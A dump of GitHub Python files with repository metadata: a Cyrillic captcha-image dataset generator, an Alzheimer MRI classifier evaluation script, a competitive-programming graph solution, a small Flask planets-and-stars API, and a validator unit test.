"file_size_in_byte": 4428, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "enum.Enum", "line_number": 4, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 10, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 26, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "6767056735", "text": "# -*- coding: utf-8 -*-\n\nimport argparse\nimport json\nimport string\nimport os\nimport shutil\nimport uuid\nfrom captcha.image import ImageCaptcha\nimport codecs\nimport itertools\nimport random\n\nMETA_FILENAME = 'meta.json'\nSTRING_DATA = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\nFLAGS = None\n\ndef _gen_captcha(img_dir, n, width, height):\n #print('dir ' + img_dir)\n if os.path.exists(img_dir):\n shutil.rmtree(img_dir)\n if not os.path.exists(img_dir):\n os.makedirs(img_dir)\n\n print('n', n)\n font_files = ['63.ttf', '5751.ttf']\n image = ImageCaptcha(width=width, height=height, fonts=font_files)\n\n with open('russian.txt', 'r', encoding='UTF-8') as file:\n file_data = file.read().split('\\n')\n\n for _ in range(n):\n for i in file_data:\n captcha = ''.join(i)\n fn = os.path.join(img_dir, '%s_%s.png' % (captcha, uuid.uuid4()))\n image.write(captcha, fn)\n\n choices = STRING_DATA\n\n data = list(itertools.permutations(choices, 4))\n print(len(data))\n length = 10\n for _ in range(n):\n for i in range(length):#num_per_image\n x = random.choice(data)\n captcha = ''.join(x)\n fn = os.path.join(img_dir, '%s_%s.png' % (captcha, uuid.uuid4()))\n image.write(captcha, fn)\n\n\ndef build_file_path(data_dir, npi, n_epoch, x):\n return os.path.join(data_dir, 'char-%s-epoch-%s' % (npi, n_epoch), x)\n\n\ndef gen_dataset(data_dir, n_epoch, npi, test_ratio):\n width = 40 + 20 * npi#40 + x * 20\n height = 100#100\n\n # meta info\n meta = {\n 'num_per_image': npi,\n 'label_size': len(STRING_DATA),\n 'label_choices': STRING_DATA,\n 'n_epoch': n_epoch,\n 'width': width,\n 'height': height,\n }\n #print(meta)\n\n train_path = build_file_path(data_dir, npi, n_epoch, 'train')\n test_path = build_file_path(data_dir, npi, n_epoch, 'test')\n print(train_path, test_path)\n\n _gen_captcha(train_path, n_epoch, width, height)\n _gen_captcha(test_path, max(1, int(n_epoch * test_ratio)), width, height)\n\n meta_filename = build_file_path(data_dir, npi, n_epoch, META_FILENAME)\n\n print(meta)\n with codecs.open(meta_filename, 'w', encoding='UTF-8') as f:\n json.dump(meta, f, indent=4)\n print('write meta info in %s' % meta_filename)\n\n\nif __name__ == '__main__':\n data_dir = 'E:\\\\Python\\\\captcha-tensorflow\\\\datasets\\\\images'\n n_epoch = 2\n nip = 4\n ratio = 0.2\n\n gen_dataset(data_dir, n_epoch, nip, ratio)\n", "repo_name": "bakaInc/3d_catpcha_solve", "sub_path": "datasets/gen_captcha.py", "file_name": "gen_captcha.py", "file_ext": "py", "file_size_in_byte": 2528, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 23, "usage_type": "call"}, {"api_name": "captcha.image.ImageCaptcha", "line_number": 27, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "captcha.image", "line_number": 35, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 35, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 36, "usage_type": "argument"}, {"api_name": "itertools.permutations", "line_number": 40, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "captcha.image", "line_number": 47, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 47, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 48, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "codecs.open", "line_number": 80, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 81, "usage_type": "call"}]}
+{"seq_id": "20270456033", "text": "import numpy as np\r\nimport os\r\nimport nibabel as nib\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\n#In[1]:\r\n\r\n# - import test arrays (select path)\r\nX_test = np.load(\"/content/drive/MyDrive/TESE/Dados/teste_image_emci.npy\")\r\ny_test = np.load(\"/content/drive/MyDrive/TESE/Dados/teste_label_emci.npy\")\r\n\r\nprint (\"Dados de teste:\", len(X_test))\r\n\r\n\r\n#In[2]:\r\ntest_image = X_test\r\ntest_label = y_test\r\nprint(test_image.shape)\r\n\r\n\r\n#In[3]:\r\nbatch_size = 3\r\ntest_loader = tf.data.Dataset.from_tensor_slices((X_test, y_test))\r\n\r\ndef test_preprocessing(volume, label):\r\n \"\"\"Process test data by only adding a channel and covert to rgb.\"\"\"\r\n volume = tf.expand_dims(volume, axis=3)\r\n volume=tf.image.grayscale_to_rgb(volume)\r\n return volume, label\r\n\r\n# - do not shuffle the test dataset \r\ntest_dataset = (\r\n test_loader.map(test_preprocessing)\r\n .batch(batch_size)\r\n .prefetch(2)\r\n)\r\n\r\n#In[4]:\r\n\r\n\r\n# - import the trained model\r\nfinal_model = keras.models.load_model('/content/drive/MyDrive/TESE/Final_class/seresnet152_final_emci.h5')\r\n\r\nfinal_model.evaluate(test_dataset)\r\nfinal_predict = final_model.predict(test_dataset)\r\n\r\nprint(final_predict)\r\n\r\npredict = (final_predict > 0.5).astype('int')\r\n\r\nprint(predict)\r\nprint(test_label)\r\n\r\n# - create an array with the desired labels \r\nlabels_multi=np.array([\"CN\", \"EMCI\", \"LMCI\", \"AD\"])\r\nlabels_bi=np.array([\"CN\", \"AD\"])\r\n\r\n#In[5]:\r\nfrom sklearn.metrics import accuracy_score, ConfusionMatrixDisplay, classification_report, roc_auc_score, roc_curve\r\nimport matplotlib.pyplot as plt\r\n\r\n#MULTICLASS\r\nConfusionMatrixDisplay.from_predictions(test_label.argmax(axis=1), predict.argmax(axis=1), display_labels=labels_multi, cmap=plt.cm.Blues)\r\n\r\n#BINARYCLASS\r\nConfusionMatrixDisplay.from_predictions(test_label, predict,display_labels=labels_bi, cmap=plt.cm.Blues)\r\n\r\n\r\n\r\n#In[6]:\r\nimport matplotlib.pyplot as plt\r\n\r\ndef plot_roc_curve(true_y, y_prob):\r\n\r\n fpr, tpr, thresholds = roc_curve(true_y, y_prob)\r\n plt.plot(fpr, tpr, label='Model')\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n\r\nplot_roc_curve(test_label, final_predict)\r\nprint(f'Model AUC score: {roc_auc_score(test_label, final_predict)}')\r\n\r\n\r\n\r\n\r\n#In[7]:\r\n\r\nhistory = pd.read_csv('/content/drive/MyDrive/TESE/Final_class/seresnet152_lmci___.csv')\r\nprint(history)\r\n\r\n\r\n#In[8]:\r\n\r\n# - Loss plot\r\nplt.plot(history['loss'], label= 'Training Loss')\r\nplt.plot(history['val_loss'], label= 'Validation Loss')\r\nplt.legend()\r\nplt.show()\r\n\r\n# - Accuracy plot\r\nplt.plot(history['binary_accuracy'], label= 'Training Accuracy')\r\nplt.plot(history['val_binary_accuracy'], label= 'Validation Accuracy')\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n#In[9]:\r\n\r\n#MULTICLASS\r\nprint(\"Test Accuracy : {}\".format(accuracy_score(test_label, predict)))\r\nprint(\"\\nClassification Report :\")\r\nprint(classification_report(test_label, predict, target_names=['CN', 'EMCI', 'LMCI','AD']))\r\n\r\n#BINARYCLASS\r\nprint(\"Test Accuracy : {}\".format(accuracy_score(test_label, predict)))\r\nprint(\"\\nClassification Report :\")\r\nprint(classification_report(test_label, predict, target_names=['CN', 'AD']))\r\n\r\n", "repo_name": "MarianaCoelho9/Alzheimer-Detection", "sub_path": "Test_model.py", "file_name": "Test_model.py", "file_ext": "py", "file_size_in_byte": 3137, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.load", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 12, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.image.grayscale_to_rgb", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.keras.models", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay.from_predictions", "line_number": 65, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 65, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay.from_predictions", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 68, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 83, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 114, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 117, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 119, "usage_type": "call"}]}
+{"seq_id": "31635186798", "text": "# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nimport sys\nread = sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\nfrom heapq import heappop,heappush\nfrom collections import defaultdict\n\nn,m = map(int,readline().split())\nab = list(map(int,read().split()))\n\n####################\nimport sys\nsys.setrecursionlimit(10**6)\n\nclass UnionFind():\n def __init__(self, n):\n self.n = n\n self.parents = [-1] * n\n\n def find(self,x):\n if(self.parents[x] < 0):\n return x\n self.parents[x] = self.find(self.parents[x])\n return self.parents[x]\n\n def size(self, x):\n return self.parents[ self.find(x) ] * -1\n\n def same(self, x, y):\n x_root = self.find(x)\n y_root = self.find(y)\n return (x_root == y_root)\n\n def union(self,x,y):\n x_root = self.find(x)\n y_root = self.find(y)\n if(x_root == y_root):\n return\n\n if( self.parents[x_root] <= self.parents[y_root] ):\n self.parents[x_root] += self.parents[y_root]\n self.parents[y_root] = x_root\n else:\n self.parents[y_root] += self.parents[x_root]\n self.parents[x_root] = y_root\n\n def members(self,x):\n root = self.find(x)\n ret = [ i for i in range(self.n) if self.find(i) == root ]\n return ret\n\n def roots(self):\n ret = [ i for i in range(self.n) if self.parents[i] < 0]\n return ret\n\n def group_count(self):\n return len(self.roots())\n\n def all_group_members(self):\n return {r: self.members(r) for r in self.roots()}\n\nimport random\n\nn = 10\nremains = [set(range(n)) for _ in range(n)]\nuf = UnionFind(n)\nedges = set()\nwhile(uf.size(0) < n):\n i = random.randint(0,n-1)\n # print(i)\n if(not remains[i]):\n continue\n js = list(remains[i])\n j = random.choice(js)\n # print(i,j)\n remains[i].remove(j)\n if(i==j):\n continue\n remains[j].remove(i)\n\n edges.add((i+1,j+1))\n uf.union(i,j)\n # print('add')\n # print(uf.parents)\n\n# print(edges)\n# print(len(edges))\n\nm = len(edges)\nab = []\nfor i,j in edges:\n ab.append(i)\n ab.append(j)\n\nprint(ab)\nprint(n,m)\n\n#####################\n\nif(m%2==1):\n print(-1)\n exit()\n\nit = iter(ab)\nlinks = [[] for _ in range(n+1)]\nfor a,b in zip(it,it):\n links[a].append(b)\n links[b].append(a)\n\nfor i,l in enumerate(links):\n print(i,l)\n\ndepth = [-1] * (n+1)\nparent = [0] * (n+1)\nchild = [set() for _ in range(n+1)]\nhq_dep = []\nd = defaultdict(int)\n\nstack = [1]\ndepth[1] = 0\nheappush(hq_dep, (0,1))\nnow_dep = 1\nwhile(stack):\n stack2 = []\n while(stack):\n i = stack.pop()\n for j in links[i]:\n if(depth[j] == -1):\n depth[j] = now_dep\n parent[j] = i\n d[i*10**6+j] = 1\n heappush(hq_dep,(now_dep*-1,j))\n stack2.append(j)\n else:\n child[j].add(i)\n now_dep += 1\n stack = stack2[::]\n\n# print(parent)\n# print(child)\n# print(d)\n# print(hq_dep)\n\nans = []\nfor _ in range(m//2):\n while(True):\n i_dep,i= hq_dep[0]\n if(parent[i]==0):\n heappop(hq_dep)\n else:\n break\n\n if(child[i]):\n j = child[i].pop()\n if(child[i]):\n k = child[i].pop()\n else:\n k = parent[i]\n parent[i] = 0\n\n if(parent[j]==i):\n parent[j] = 0\n else:\n child[j].remove(i)\n if(parent[k]==i):\n parent[k] = 0\n else:\n child[k].remove(i)\n\n ans.append((i,j))\n ans.append((i,k))\n\n\n else:\n j = parent[i]\n child[j].remove(i)\n heappop(hq_dep)\n if(child[j]):\n k = child[j].pop()\n else:\n k = parent[j]\n parent[j] = 0\n if(parent[k]==j):\n parent[k] = 0\n else:\n print(k,j)\n print(parent)\n print(child)\n child[k].remove(j)\n\n ans.append((j,i))\n ans.append((j,k))\n\n\nprint('\\n'.join(map(lambda x: ' '.join(map(str,x)), ans)))\n\n\n\n\n'''\n端点から決めていけば確定する?\n\n閉路どうしよう問題\nK5とか。\n\n先に閉路?\n\n偶数長の道は処理できる。\n\n二部グラフである必要ある?\n→ ない\n\n\n一本出たら、もう一本出さないといけない。\n\n2辺消して、継続できればOK?\n\n頂点数奇数の木はいける\n\n\n木がいけるのにグラフがいけないことある?\n→ 全体の連結を保ったまま辺を除いていければよい\n\n根を決めておいて、一番遠いところから処理すればよい?\n\n頂点深さのheapqを持つ\n一番深い頂点をとる。\n端点じゃなければ、2辺取る。\n\n端点なら1辺とって、行った先か一番深いところへ行く\n\nこれを繰り返せばOKでは?\n\n'''\n", "repo_name": "komajun365/competitive_programming", "sub_path": "agc/agc035_old/b2.py", "file_name": "b2.py", "file_ext": "py", "file_size_in_byte": 5221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.stdin", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.setrecursionlimit", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 85, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 90, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 133, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 137, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 148, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 165, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 193, "usage_type": "call"}]}
+{"seq_id": "10657536490", "text": "import os\nimport sys\nfrom models import db, setup_db, Planets, Stars\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom auth import AuthError, requires_auth\n\n\ndef create_app(test_config=None):\n\n app = Flask(__name__)\n setup_db(app)\n CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, POST, PATCH, DELETE, OPTIONS')\n return response\n\n @app.route(\"/\")\n def index():\n return jsonify({\"status\": \"Hey I'm working\"})\n\n '''planets'''\n\n @app.route(\"/planets\")\n @requires_auth('get:planets')\n def get_planets(payload):\n error = False\n try:\n get_planets = Planets.query.all()\n planets = []\n for planet in get_planets:\n planets.append({\n 'id': planet.id,\n 'name': planet.name,\n 'moons_number': planet.moons_number\n })\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'planets': planets\n })\n\n @app.route(\"/planets\", methods=[\"POST\"])\n @requires_auth('post:planets')\n def add_planet(payload):\n error = False\n try:\n name = request.get_json()['name']\n moons_number = request.get_json()['moonsNumber']\n add = Planets(\n name=name,\n moons_number=moons_number\n )\n add.insert()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True,\n 'name': name,\n 'moons_number': moons_number\n })\n\n @app.route('/planets/', methods=['DELETE'])\n @requires_auth('delete:planets')\n def del_planets(payload, planet_id):\n error = False\n try:\n planets = Planets.query.filter_by(id=planet_id).first()\n planets.delete()\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'success': True\n })\n\n @app.route('/planets/', methods=[\"PATCH\"])\n @requires_auth('patch:planets')\n def patch_planets(payload, planet_id):\n error = False\n get_planets = Planets.query.filter_by(id=planet_id).first()\n try:\n name = request.get_json()[\"name\"]\n moons_number = request.get_json()[\"moonsNumber\"]\n get_planets.name = name\n get_planets.moons_number = moons_number\n get_planets.update()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True\n })\n\n '''stars'''\n\n @app.route(\"/stars\")\n @requires_auth('get:stars')\n def stars(payload):\n error = False\n try:\n get_stars = Stars.query.all()\n stars = []\n for star in get_stars:\n stars.append({\n 'id': star.id,\n 'name': star.name,\n 'age': star.age\n })\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'stars': stars})\n\n @app.route(\"/stars\", methods=[\"POST\"])\n @requires_auth('post:stars')\n def add_stars(payload):\n error = False\n try:\n name = request.get_json()['name']\n age = request.get_json()['age']\n add = Stars(\n name=name,\n age=age\n )\n add.insert()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True,\n 'name': name,\n 'age': age\n })\n\n @app.route('/stars/', methods=['DELETE'])\n @requires_auth('delete:stars')\n def del_stars(payload, star_id):\n error = False\n stars = Stars.query.filter_by(id=star_id).first()\n try:\n stars.delete()\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'success': True\n })\n\n @app.route('/stars/', methods=['PATCH'])\n @requires_auth('patch:stars')\n def patch_stars(payload, star_id):\n error = False\n try:\n get_stars = Stars.query.filter_by(id=star_id).first()\n name = request.get_json()[\"name\"]\n age = request.get_json()[\"age\"]\n get_stars.name = name\n get_stars.age = age\n get_stars.update()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True\n })\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"Not found\"\n }), 404\n\n @app.errorhandler(422)\n def unprocessable(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": \"unprocessable\"\n }), 422\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 400,\n \"message\": \"bad request\"\n }), 400\n\n @app.errorhandler(500)\n def bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 500,\n \"message\": \" Internal Server Error\"\n }), 500\n\n @app.errorhandler(AuthError)\n def auth_error(error):\n return jsonify({\n \"success\": False,\n \"error\": error.status_code,\n \"message\": error.error['description']\n }), error.status_code\n\n return app\n\n\napp = create_app()\n", "repo_name": "shaimaaseyam/capastone", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 6643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "models.setup_db", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Planets.query.all", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Planets.query", "line_number": 35, "usage_type": "attribute"}, {"api_name": "models.Planets", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "models.Planets", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 71, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Planets.query.filter_by", "line_number": 82, "usage_type": "call"}, {"api_name": "models.Planets.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.Planets", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 90, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 78, "usage_type": "call"}, {"api_name": "models.Planets.query.filter_by", "line_number": 98, "usage_type": "call"}, {"api_name": "models.Planets.query", "line_number": 98, "usage_type": "attribute"}, {"api_name": "models.Planets", "line_number": 98, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 101, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 109, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 111, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Stars.query.all", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Stars.query", "line_number": 122, "usage_type": "attribute"}, {"api_name": "models.Stars", "line_number": 122, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 136, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 144, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 144, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 145, "usage_type": "name"}, {"api_name": "models.Stars", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 157, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 140, "usage_type": "call"}, {"api_name": "models.Stars.query.filter_by", "line_number": 167, "usage_type": "call"}, {"api_name": "models.Stars.query", "line_number": 167, "usage_type": "attribute"}, {"api_name": "models.Stars", "line_number": 167, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 174, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 176, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 164, "usage_type": "call"}, {"api_name": "models.Stars.query.filter_by", "line_number": 185, "usage_type": "call"}, {"api_name": "models.Stars.query", "line_number": 185, "usage_type": "attribute"}, {"api_name": "models.Stars", "line_number": 185, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 186, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 186, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 187, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 195, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 197, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 203, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 219, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 227, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 235, "usage_type": "call"}, {"api_name": "auth.AuthError", "line_number": 233, "usage_type": "argument"}]}
+{"seq_id": "13756007653", "text": "import unittest\nimport json\nfrom validators.greaterthan import Greaterthan\n\n\nclass GreaterthanTest(unittest.TestCase):\n\n def _load_test_data(self):\n self.validation = json.loads('{\"condition\": \"greaterthan\",\"value\": \"10\",\"type\": \"error\",\"message\": \"This field should be less than 11\"}')\n\n def test_is_greater_than(self):\n self._load_test_data()\n number = \"11\"\n validator = Greaterthan(self.validation)\n assert validator.is_valid(number) == False\n\n def test_is_less_than(self):\n self._load_test_data()\n number = \"2\"\n validator = Greaterthan(self.validation)\n assert validator.is_valid(number)\n\n def test_is_than_with_decimal(self):\n self._load_test_data()\n number = \"1.0\"\n validator = Greaterthan(self.validation)\n assert validator.is_valid(number)\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "ONSdigital/alpha-eq-survey-runner", "sub_path": "validators/greaterthan_test.py", "file_name": "greaterthan_test.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 9, "usage_type": "call"}, {"api_name": "validators.greaterthan.Greaterthan", "line_number": 14, "usage_type": "call"}, {"api_name": "validators.greaterthan.Greaterthan", "line_number": 20, "usage_type": "call"}, {"api_name": "validators.greaterthan.Greaterthan", "line_number": 26, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 30, "usage_type": "call"}]}
